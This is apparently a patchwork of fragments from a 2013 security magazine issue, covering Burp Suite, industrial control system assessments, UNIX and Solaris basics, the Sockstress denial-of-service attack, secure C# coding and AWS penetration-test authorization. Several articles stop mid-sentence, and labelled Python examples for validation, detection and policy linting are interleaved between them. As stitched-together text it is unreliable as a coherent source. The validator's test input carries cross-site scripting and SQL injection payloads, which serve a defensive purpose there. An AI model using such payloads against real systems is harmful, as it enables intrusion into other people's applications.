- An intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
- A repeater tool, for manipulating and resending individual requests.
- A sequencer tool, for testing the randomness of session tokens.
- The ability to save your work and resume working later.
- Extensibility, allowing you to easily write your own plug-ins, to perform complex and highly customized tasks within Burp.
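"Accept known good" is easy to state and easy to get wrong once a form has a dozen fields, so here is what rule number one looks like in code. This Python is an added example, not part of the article or of Burp Suite: each field is checked against an explicit allowlist (a pattern or a closed set of values) and anything that does not match is rejected, with no attempt to recognise "bad" input. The field names and patterns are assumptions chosen for illustration; the output-encoding step at the end shows that validation at the entry point and encoding at the sink are complementary, not alternatives.

```python
import re
import html

# "Accept known good": every field has an explicit allowlist pattern; input that
# does not match is rejected outright. Field names and patterns are assumed.
ALLOWLIST = {
    "username": re.compile(r"^[A-Za-z0-9_]{3,32}$"),
    "account_id": re.compile(r"^[1-9][0-9]{0,9}$"),
    "locale": re.compile(r"^[a-z]{2}(?:-[A-Z]{2})?$"),
}

# A sort key is a closed set of tokens, not free text, so its allowlist is an enum.
ALLOWED_SORT = {"name", "date", "size"}

def validate(form):
    """Return (clean, errors): clean holds the converted values of accepted fields,
    errors holds one message per rejected or missing field. A field is never
    partially accepted or "sanitised" into something else."""
    clean, errors = {}, {}
    for field, pattern in ALLOWLIST.items():
        value = form.get(field)
        if value is None:
            errors[field] = "missing"
        elif not isinstance(value, str) or not pattern.fullmatch(value):
            errors[field] = "does not match allowed format"
        else:
            clean[field] = int(value) if field == "account_id" else value
    sort = form.get("sort", "name")
    if sort in ALLOWED_SORT:
        clean["sort"] = sort
    else:
        errors["sort"] = "not an allowed value"
    return clean, errors

def render_greeting(clean):
    """Output encoding at the sink: even an allowlisted value is escaped for the
    context it is written into, so a later relaxation of the pattern cannot
    silently reintroduce cross-site scripting."""
    return "<p>Hello, %s</p>" % html.escape(clean["username"])

if __name__ == "__main__":
    # Constructed requests: one well-formed, one carrying typical injection payloads.
    print(validate({"username": "david_01", "account_id": "42", "locale": "en-GB", "sort": "date"}))
    print(validate({"username": "<script>alert(1)</script>", "account_id": "1 OR 1=1",
                    "locale": "en", "sort": "name; DROP"}))
```

Note what the rejected request shows: the SQL and script payloads are refused not because a blocklist recognised them, but because a username is only ever letters, digits and underscores and an account id is only ever a number.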
The topic of assessing the security of (or hacking) industrial control systems has been the subject of many papers, books and articles. The goal of this article is not to redo any of these writings, as they provide a great introduction to the field (although part of these writings are simply hype, so evaluate critically). But even with all the resources available, it is common for security professionals to reduce industrial control systems to SCADA, which is incorrect. This article aims to help the reader to better understand industrial control systems by describing two important types: DCS and SCADA. In addition it will provide key items to consider when setting the scope of an industrial control systems security assessment. In order to fully benefit from this article, some prior experience in assessing security within the office-IT domain is necessary.

In this article, first a background on industrial control systems usage and application will be provided, followed by a fictitious example of process control, a brief description of information exchange with other systems, and items to keep in mind when setting the scope of a security assessment on any industrial control system. After this, the distributed control system and SCADA types of industrial control systems will be described. Both the distributed control system and SCADA descriptions will include type-specific items to remember when setting security assessment scope.

Usage

Industrial control systems are used by various industries, including water, electrical, utilities and oil and gas. The applications of industrial control systems include nuclear reactors, chemical plants, substations, cranes, assembly lines, and many others. Other lesser known applications include logistics, manufacturing and shipping (yes, ships).

Various forms of industrial control systems exist. Depending on the application one form of industrial control system may be chosen over another, but the principle remains the same: controlling a process by measuring process variables and adjusting parameters if needed.

The reason for automating differs per instance, but is typically meant to enhance process efficiency, ensure a constant quality, reduce cost or health and safety risks, or a combination of these. The degree to which automation has been achieved, however, varies per instance. Control is achieved by embedding various types of instruments (sensors and control elements, also called actuators) into the process. These instruments measure process variables by some form of physical quantity, such as mass, temperature etc. The measurement

Figure 1. Example process: liquid receiving tank with instruments to monitor level (high and low) and temperature, discharged by a bottom valve
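The principle stated above, measure a process variable, decide, adjust an actuator, is the whole of a control loop, and the tank in Figure 1 is small enough to simulate in a few lines. The following Python is an added example, not from the article: it models the receiving tank with a high and a low level switch and a bottom discharge valve, runs the loop, and then runs it again with the level reading forced to zero, which is the situation an assessor cares about, since a controller acts on whatever the sensor reports. All level thresholds and flow rates are assumed values for illustration.

```python
# Constructed model of the Figure 1 process: a receiving tank with high/low
# level switches (sensors) and a bottom discharge valve (actuator).
# All numbers are assumptions chosen for illustration, not from the article.

LEVEL_HIGH = 80.0   # high level switch trips at 80% of tank capacity
LEVEL_LOW = 20.0    # low level switch trips at 20% of tank capacity
INFLOW = 5.0        # liquid arriving per time step
OUTFLOW = 12.0      # liquid discharged per step while the bottom valve is open

def controller(level, valve_open):
    """One discrete control step: open the valve when the high switch trips,
    close it when the low switch trips, otherwise keep the previous state
    (hysteresis between the two switches avoids chattering the valve)."""
    if level >= LEVEL_HIGH:
        return True
    if level <= LEVEL_LOW:
        return False
    return valve_open

def step(level, valve_open):
    """Process physics for one step; the level is clamped to the tank's 0..100%."""
    return max(0.0, min(100.0, level + INFLOW - (OUTFLOW if valve_open else 0.0)))

def simulate(steps, level=50.0, valve_open=False):
    """Run the loop with a healthy sensor. Returns the (level, valve) trace and
    the peak level reached: it stays just above LEVEL_HIGH, never at the rim."""
    trace = []
    for _ in range(steps):
        valve_open = controller(level, valve_open)   # controller reads the true level
        level = step(level, valve_open)
        trace.append((round(level, 1), valve_open))
    return trace, max(lvl for lvl, _ in trace)

def simulate_stuck_sensor(steps, level=50.0):
    """Same loop, but the level reading delivered to the controller is stuck at 0
    (a failed or tampered measurement): the high switch never trips, the valve
    never opens, and the physical tank fills to the rim."""
    trace = []
    valve_open = False
    for _ in range(steps):
        valve_open = controller(0.0, valve_open)     # controller sees a bogus reading
        level = step(level, valve_open)              # the real tank keeps filling
        trace.append((round(level, 1), valve_open))
    return trace, level

if __name__ == "__main__":
    healthy, peak = simulate(30)
    print("healthy loop peak level: %.1f%%" % peak)
    _, final = simulate_stuck_sensor(20)
    print("stuck sensor final level: %.1f%%" % final)
```

The point for assessment scope is in the second run: integrity of the measurement path (field wiring, the I/O module, the network between instrument and controller) is a safety property, not only a confidentiality one, which is why it belongs in the scope discussion rather than being left to the office-IT checklist.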
The most important enhancement made to the OS by the programmers at Berkeley was adding networking capability. This enabled the OS to operate in a local area network (LAN). In 1988, AT&T UNIX, BSD UNIX, and other UNIX OSs were folded into what became System V Release 4 (SVR4) UNIX. This was a new-generation OS, which became an industry standard. The new SVR4 UNIX became the basis for not only the Sun and AT&T versions of the UNIX environment, but also IBM's AIX and Hewlett-Packard's HP-UX.

UNIX was constructed with the following mechanisms:

Kernel

The kernel is the core/heart of the OS and is responsible for all the processing in the computer. It manages all the physical resources of the computer, including file systems, CPU, memory, etc.

Shell

The shell is a command interpreter and acts as an interface between the system and the user. The shell accepts the command and passes it to the kernel, which then executes the command. In Oracle Solaris 11 and Oracle Enterprise Linux the default shell is the Bourne-again shell, also known as bash.

File System

A file system is a logical collection of files and directories on a partition or a disk. It has a root directory, which contains all other files and directories in the operating system. The root directory is identified as /. Each file or directory is identified by its name and a unique identifier known as the inode number.

Figure 1. Directory structure

Process

Every program you run or execute in UNIX/Linux creates a process. When you log in to the system and start the shell, several processes will be started, depending on the programs associated with the login shell. Whenever you execute a command in the shell, it will start a process. And a process can fur-
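The sentence that a file is identified by its name and by an inode number hides a distinction that matters in forensics and in access control: the name is one of possibly several handles, the inode is the file. The following Python is an added example, not from the article, and makes the distinction observable on any POSIX file system that supports hard links (a scratch directory is created and removed; nothing else on the host is assumed). It creates a file, a hard link to it, a byte copy and a rename, and reports which of them share the (device, inode) pair.

```python
import os
import shutil
import tempfile

def file_id(path):
    """(device, inode) is the kernel's identity for a file; the path is only a name."""
    st = os.stat(path)
    return (st.st_dev, st.st_ino)

def inode_demo():
    """Build a small scratch layout and return observations about file identity.
    Everything here is constructed on the fly and cleaned up afterwards."""
    workdir = tempfile.mkdtemp(prefix="inode-demo-")
    try:
        original = os.path.join(workdir, "original.txt")
        with open(original, "w") as fh:
            fh.write("hello\n")

        link = os.path.join(workdir, "hardlink.txt")
        os.link(original, link)            # a second name for the same inode

        copy = os.path.join(workdir, "copy.txt")
        shutil.copyfile(original, copy)    # same bytes, but a brand-new inode

        obs = {
            "link_shares_inode": file_id(original) == file_id(link),
            "copy_shares_inode": file_id(original) == file_id(copy),
            "link_count": os.stat(original).st_nlink,   # names pointing at this inode
        }

        before = file_id(original)
        renamed = os.path.join(workdir, "renamed.txt")
        os.rename(original, renamed)       # the name changes, the inode does not
        obs["rename_keeps_inode"] = file_id(renamed) == before
        obs["old_name_gone"] = not os.path.exists(original)
        return obs
    finally:
        shutil.rmtree(workdir)

if __name__ == "__main__":
    for key, value in inode_demo().items():
        print("%-20s %s" % (key, value))
```

Two practical consequences follow: a tool that keys on paths (a file-integrity baseline, an allowlist of executables) can be sidestepped by a rename or an extra hard link, while one that keys on (device, inode) follows the file; and deleting one name of a file whose link count is greater than one removes nothing from disk.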
Figure 3. CentOS

Figure 4. Oracle Solaris 11 Desktop Menu

Installing Oracle Solaris 11 inside a Virtual Machine with Live CD

The easiest way to start using Oracle Solaris 11 is to install it into a virtual machine on top of a host operating system running on a physical machine. The figure below shows Oracle Solaris 11 installed on Apple OS X using Oracle VM VirtualBox.

Oracle Solaris 11 will recognize the virtualized devices that the virtual machine provides. If you run Oracle Solaris 11 in full-screen mode, you might actually forget that there's another operating system running behind it.

The one drawback to this approach is that you need enough memory to run two operating systems simultaneously; a minimum of 2 GB is recommended for good performance. You should also allow a minimum of 7 GB of disk space to install the operating system in the virtual machine.

Figure 5. Terminal window
A Denial of Service
Primer via Sockstress
Effective. Efficient. Lean and Mean. These words can all be used
to describe Sockstress: a type of Denial of Service attack that
zeroes right in via TCP to wreak havoc on large or small systems.
The idea behind Sockstress is simple: where there is a TCP stack,
there is inherent vulnerability. In this article we are going to
examine a bit of the history of this interesting attack and explore
its more recent use.
We will also describe our execution of the attack, which was set up in a laboratory environment to measure the effectiveness of Sockstress as a Denial of Service (DoS) attack tool.

The DoS-Sockstress Connection

One of the most popular types of attack on information systems is a Denial of Service attack, which may take on any number of vectors and guises. An attacker may want to reduce or completely deny service indefinitely, or just cause some level of grief at the target. Many DoS options are available to the attacker; some have been around for a while and have generally been mitigated, though new ones do emerge periodically.

Sockstress is a denial of service attack that was announced in 2008 and which comes in half a dozen varieties. As with other vulnerabilities, Sockstress capitalizes on abusing functionality of existing technology in a way that was not originally intended. Although this particular attack has been well known and documented for some time, it still has the ability to cause trouble in large or small systems. In order to really understand how this attack works, a small laboratory system is going to be subjected to Sockstress in order to show a progression of the effects of the attack so that it can be thoroughly understood.

Often denial of service attacks are associated with overwhelming the bandwidth capabilities of websites in order to bring them down, and this is still a popular option. Usually this type of attack must rely on connections made by many different machines that are typically members of botnets. This is known as a Distributed Denial of Service, or DDoS, attack. Sockstress, on the other hand, does not require tremendous amounts of bandwidth to do its job. It also does not need thousands of computers making connections in order to be successful. Depending on the number of connections made to the endpoint service, the attack may quickly bring its destructive force to bear on smaller websites which do not have the luxury of load balancing across a number of servers.

Not Your Typical DoS Attack

Denial of Service attacks still pop onto the radar of service providers periodically, just when service usage is expected to be high. As an example, sporting events and gambling go hand in hand, and give a terrific example of when DoS or DDoS attacks are going to happen. Attackers know well ahead of time when websites that have anything to do with these events are going to experience high usage, and can plan accord-
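The contrast drawn above, a bandwidth flood spread across a botnet versus a low-bandwidth attack that needs neither many hosts nor much traffic, is also the contrast a defender can measure: the second kind shows up as many held-open connections from very few peers in the server's own connection table. The following Python is an added example, not from the article, that reads lines in the shape of ss -tan output (a constructed sample, not captured from a real system) and flags peers holding more than a threshold of established connections to a service. The threshold value is an assumption to be tuned per site.

```python
import re
from collections import Counter

# Constructed lines in the shape of "ss -tan" output (State, Recv-Q, Send-Q,
# local address:port, peer address:port); not captured from a real system.
SAMPLE_SS_OUTPUT = """\
State      Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB      0      0      10.0.0.80:80         198.51.100.7:51001
ESTAB      0      0      10.0.0.80:80         198.51.100.7:51002
ESTAB      0      0      10.0.0.80:80         198.51.100.7:51003
ESTAB      0      0      10.0.0.80:80         198.51.100.7:51004
ESTAB      0      0      10.0.0.80:80         198.51.100.7:51005
ESTAB      0      0      10.0.0.80:80         203.0.113.9:44021
ESTAB      0      0      10.0.0.80:443        203.0.113.9:44022
LISTEN     0      128    0.0.0.0:80           0.0.0.0:*
"""

LINE_RE = re.compile(r"^(\S+)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\S+)$")

def established_per_peer(text, local_port=None):
    """Count ESTAB connections per peer address, optionally for one local port."""
    counts = Counter()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(1) != "ESTAB":
            continue
        _state, _laddr, lport, peer, _pport = m.groups()
        if local_port is None or int(lport) == local_port:
            counts[peer] += 1
    return counts

def flag_concentrated_sources(text, threshold=4, local_port=None):
    """Return {peer: count} for peers holding more than `threshold` established
    connections. A sustained count from a handful of sources is the footprint a
    low-bandwidth, connection-holding attack leaves in the table; a bandwidth
    flood from a botnet spreads the same load over thousands of peers instead."""
    return {peer: n for peer, n in established_per_peer(text, local_port).items()
            if n > threshold}

if __name__ == "__main__":
    for peer, n in flag_concentrated_sources(SAMPLE_SS_OUTPUT).items():
        print("peer %s holds %d established connections" % (peer, n))
```

One caveat before wiring this into an alert: a large office behind a single NAT address or a reverse proxy in front of the service produces the same concentration legitimately, so the threshold should be set from a baseline of normal traffic, and the per-port filter is there so that a proxy tier can be excluded.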
Secure Coding
in C# .NET
As all of us programmers go day by day, writing more and more code, improving what's already written and developing new and improved code, we devote our time and effort to writing software that will do the work for us and for our customers. As the industry relies on speed and efficiency, we put great effort into optimizing performance, creating eye-appealing and stylish GUIs (Graphical User Interfaces), and using state-of-the-art technology to attract as many buyers for our products as possible.
However, even though the above is important, there is a concept that is often disregarded and overlooked: secure code writing.

As the name implies, secure coding refers to the idea that software almost always contains flaws, in either the design or the internal functions, that could lead to security breaches and be exploited by hackers and crackers.

Now, the magnitude of such a thing can range from minimal to catastrophic in terms of the damage that is done. In other words, we can consider the severity of damage as the effect that is caused upon exploitation. Does the damage apply just to the user, are others affected by it, or can it bring down an entire enterprise? Even though it might seem odd that computer software can take down an entire enterprise, we need to remember that a lot of today's day-to-day business and activities are done using computers, such as e-commerce, online banking, cloud services, etc.

It's important to note that secure programming applies to all programming languages.

Some issues that are addressed by security are confidentiality, integrity, and availability (CIA) (taken from Whatis.com):

Confidentiality prevents sensitive information from reaching the wrong people, while making sure that the right people can in fact get it. A good example is an account number or routing number when banking online. Data encryption is a common method of ensuring confidentiality. User IDs and passwords constitute a standard procedure; two-factor authentication is becoming the norm and biometric verification is an option as well. In addition, users can take precautions to minimize the number of places where the information appears, and the number of times it is actually transmitted to complete a required transaction.

Integrity involves maintaining the consistency, accuracy, and trustworthiness of data over its entire life cycle. Data must not be changed in transit, and steps must be taken to ensure that data cannot be altered by unauthorized people (for example, in a breach of confidentiality). In addition, some means must be in place to detect any changes in data that might occur as a result of non-human-caused events such as an electromagnetic pulse (EMP) or server crash. If an unexpected change occurs, a backup copy must be available to restore the affected data to its correct state.
- Writing type-safe code: To enable the code to benefit from code access security, we must use a compiler that generates verifiably type-safe code.
- Imperative and declarative syntax: Interaction with the runtime security system is performed using imperative and declarative security calls. Declarative calls are performed using attributes; imperative calls are performed using new instances of classes within your code. Some calls can be performed only imperatively, while others can be performed only declaratively. Some calls can be performed in either manner.
- Requesting permissions for our code: Requests are applied to the assembly scope, where your code informs the runtime about permissions that it either needs to run or specifically does not want. Security requests are evaluated by the runtime when our code is loaded into memory. Requests cannot influence the runtime to give our code more permissions than the runtime would have given your code had the request not been made. However, requests are what your code uses to inform the runtime about the permissions it requires in order to run.
- Using secure class libraries: Our class libraries use code access security to specify the permissions they require in order to be accessed. We should be aware of the permissions required to access any library that our code uses and make appropriate requests in our code.

Principal, Identity Objects and Evidence

Identity Objects

Identity objects are used to encapsulate information about the user or entity being validated.

Figure 2. Generic Identity example

Principal (MSDN)

A principal represents the identity and role of a user and acts on the user's behalf. Role-based security in the .NET Framework supports three kinds of principals:

- Generic principals represent users and roles that exist independent of Windows NT and Windows 2000 users and roles.
- Windows principals represent Windows users and their roles (or their Windows NT and Windows 2000 groups). A Windows principal can impersonate another user, which means the principal can access a resource on a user's behalf while presenting the identity that belongs to that user.
- Custom principals can be defined by an application in any way that is needed for that particular application. They can extend the basic notion of the principal's identity and roles.

Principal Objects

Principal objects are used for representing the security context under which the code is running, integrating with the identity objects to decide who is allowed to run what. .NET provides a GenericPrincipal object and a WindowsPrincipal object.

The IPrincipal interface defines access to its associated Identity object, as well as a method to determine whether the identified user is a member of a role: for instance, whether the user david is a member of the accounting role, a role that is able to use functionality for updating the DB.
Code Signing

Code signing is the method of using a certificate-based digital signature to digitally sign executables, DLLs, and scripts in order to verify the source's identity and to ensure that the code has not been changed or corrupted since it was signed by the source. This helps us and our applications to determine whether the software can be trusted for execution (Figure 6).

Figure 7. Signingtool.exe Example

Digital Certificates
Conclusion
As you can see, C# and the .NET framework provide lots of easy-to-use, easy-to-understand and easy-to-manage sets of classes, tools, and functions.

However, there is still a lot more to .NET than these examples and a lot more to learn and use when building security-aware applications and software.

I believe that MSDN and other websites are a great source of information, but it is important to first understand how things work, what their purpose is, and how to integrate them, rather than just copying and pasting into our code.

Don't forget, after all this, we still need to make sure that the code can actually run, and not overload it with overhead.

I hope that it's been informative for you, and I'd like to thank you for reading!
Gilad Ofir
Has years of experience as a System Administrator and Integrator; he has been working mostly with Windows OS and Linux OS, working with many AD environments integrated with other Microsoft-related products. Computer programmer, best at the C# language. He is now an Information Security Consultant at Defensia Company, advising customers on Information Security related issues, pentesting, vulnerability assessment, code review and many more.
TBO 03/2013
BONUS
I know what you are saying to yourself. This is my Amazon server instance, I can scan it if I want! Yes, even if you are a 3rd-party tester, you do have the right to scan a customer's Amazon server instance if you go about it the right way. The right way does not permit testing of m1.small or t1.micro instance types due to potential adverse performance impacts on customers you may be sharing resources with. For all other instance types, Amazon requires its customers to obtain permission to conduct penetration tests. Don't be scared. This is a very simple process and I will walk you through it.

Handling the Paperwork

Amazon requires you to fill out the AWS Vulnerability / Penetration Testing Request Form to begin the penetration testing approval process. They recommend that the customers themselves fill in this form and then let their 3rd party know of the approval status. As most of us know, the customer hired you for a reason and they want to do as little as possible. That being said, I recommend setting up a remote screen-sharing session and walking your customer through this process. They will need to be logged into the Amazon AWS Portal using the credentials associated with the instances you wish to test.

The Form

Amazon's electronic form will require you to fill in the exact instance(s) you would like to test and the source and destination IP address(es), along with the date range you would like to perform your scan in. You will also need your AWS Account Number, which automatically pre-populates on the form when you log on to your AWS account. To submit the form you also have to agree to the Terms and Conditions of this penetration test. Conditions, who cares? I never read them and always click accept. In this case, I'm strongly advising you to read the Terms and Conditions, specifically regarding the appropriate tools for the test. Amazon strictly forbids utilizing your pentest tools to perform a Denial-of-Service (DoS) attack, even against your own instances. They specifically mention prohibiting protocol flooding (SYN flooding, ICMP flooding, UDP flooding) and resource request flooding (HTTP request flooding, login request flooding, API request flooding). Amazon will hold you responsible for any damages to AWS or any AWS customers impacted by your penetration activities, so please be careful! Amazon is huge and they have more lawyers than you. After submitting the Amazon Penetration Testing Request form, you or your customer will receive a response from Amazon from an actual human being within one business day, at least letting you know they received your request.
...some lame business impact reason that suddenly popped up? Yes, that does happen all the time. You go through days of planning and all of a sudden the business tells you to delay your project. If this happens to you, don't worry. All you have to do is reply to the Amazon authorization e-mail and ask to extend your testing period to the new date. Remember, you can't perform the test outside of your date range without first asking for this extension.

    {
      "Statement": [
        {
          "Action": "ec2:DescribeInstances",
          "Effect": "Allow",
          "Resource": "*"
        }
      ]
    }
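The policy listed above grants exactly one read-only action, which is all that is needed to look up the instances you will enter on the request form, and that is worth keeping true as the engagement evolves. The following Python is an added example, not from the article or from AWS: it parses an IAM policy document in the shape shown (the article's listing carries no Version element, so none is added to the constructed copy here) and reports any Allow statement that goes beyond reading EC2 metadata. The set of read-only action prefixes is an assumption for this check, not an AWS-published list.

```python
import json

# The article's policy, reproduced as constructed JSON text for this example.
ARTICLE_POLICY = """
{
  "Statement": [
    {
      "Action": "ec2:DescribeInstances",
      "Effect": "Allow",
      "Resource": "*"
    }
  ]
}
"""

# Prefixes treated as read-only for this check; an assumption, not an AWS list.
READ_ONLY_PREFIXES = ("ec2:Describe", "ec2:Get", "ec2:List")

def allowed_actions(policy_text):
    """Flatten every Allow statement into (action, resource) pairs. Statement,
    Action and Resource may each be a single value or a list in IAM documents."""
    policy = json.loads(policy_text)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    pairs = []
    for st in statements:
        if st.get("Effect") != "Allow":
            continue
        actions = st.get("Action", [])
        resources = st.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        for action in actions:
            for resource in resources:
                pairs.append((action, resource))
    return pairs

def lint_policy(policy_text):
    """Return one finding per allowed action that is a wildcard or is not a
    read-only EC2 call. An empty list means the policy still only reads metadata."""
    findings = []
    for action, resource in allowed_actions(policy_text):
        if action == "*" or action.endswith(":*"):
            findings.append("wildcard action %r on %r" % (action, resource))
        elif not action.startswith(READ_ONLY_PREFIXES):
            findings.append("mutating action %r on %r" % (action, resource))
    return findings

if __name__ == "__main__":
    print(lint_policy(ARTICLE_POLICY) or "policy is read-only")
```

Run it against the policy attached to the IAM user the tester is given, before and after the engagement: the form commits you to a scope, and a user that quietly accumulated ec2:* during the project is the kind of drift that turns a scoped test into an incident.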
Figure 5. URLInput

Figure 7. TestStatus

Keep on Scanning

Every good pentester knows that it's always a good idea to use multiple tools to perform your tests to increase your results.